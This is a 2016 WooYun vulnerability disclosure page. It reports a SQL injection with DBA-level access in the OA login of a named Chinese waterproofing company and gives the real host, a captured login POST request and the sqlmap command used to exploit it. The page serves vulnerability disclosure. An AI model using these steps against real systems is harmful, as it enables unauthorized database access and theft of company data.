当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0188789

漏洞标题:北京东方雨虹防水技术股份有限公司SQL注入/dba权限

相关厂商:北京东方雨虹防水技术股份有限公司

漏洞作者: 路人甲

提交时间:2016-03-25 10:07

修复时间:2016-05-09 10:07

公开时间:2016-05-09 10:07

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-03-25: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-05-09: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

北京东方雨虹防水技术股份有限公司成立于1998年3月,现已发展成为一家集防水材料研发、制造、销售及施工服务于一体的中国防水行业龙头企业,是国家高新技术企业、中国防水行业唯一的上市公司(SZ002271),拥有业内首家国家级企业技术中心和博士后科研工作站。员工人数5200人。
问题站点:http://oa.yuhong.com.cn:89/login.do
登陆,抓包:

POST http://oa.yuhong.com.cn:89/verifyLogin.do HTTP/1.1
Host: oa.yuhong.com.cn:89
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://oa.yuhong.com.cn:89/login.do
Cookie: testBanCookie=test; JSESSIONID=abcwgSzSBG6IPfoIXWOov; Hm_lvt_32d4a7cf09119b58f47c04ff6baf64fd=1458826044,1458826070; Hm_lpvt_32d4a7cf09119b58f47c04ff6baf64fd=1458826527; LXB_REFER=www.baidu.com
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 98
loginid=admin&password=1&clienttype=Webclient&clientver=4.6&language=&country=&verify=


用sqlmap跑:sqlmap.py -r oa.txt --batch
DBA权限:

yh1.png

yh2.png

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)